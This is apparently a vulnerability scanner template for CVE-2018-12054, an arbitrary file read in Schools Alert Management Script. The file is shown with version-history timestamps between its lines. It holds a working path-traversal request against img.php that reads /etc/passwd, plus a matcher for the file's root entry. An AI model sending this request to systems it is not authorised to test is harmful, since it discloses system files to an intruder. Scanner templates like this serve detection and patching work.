2021-10-18 13:04:38 +00:00
id : CVE-2018-12054
info :
name : Schools Alert Management Script - Arbitrary File Read
author : wisnupramoedya
severity : high
2022-05-17 09:18:12 +00:00
description : Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal.
2021-10-18 13:04:38 +00:00
reference :
- https://www.exploit-db.com/exploits/44874
2022-04-29 19:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-12054
2022-05-17 09:18:12 +00:00
- https://github.com/unh3x/just4cve/issues/4
- https://www.exploit-db.com/exploits/44874/
2021-10-18 15:14:58 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-10-18 15:14:58 +00:00
cve-id : CVE-2018-12054
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : cve,cve2018,lfi,edb
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-10-18 13:04:38 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-10-18 13:04:38 +00:00
- method : GET
path :
- "{{BaseURL}}/img.php?f=/./etc/./passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-10-18 13:04:38 +00:00
- type : status
status :
- 200
2022-04-29 19:58:07 +00:00
# Enhanced by mp on 2022/04/26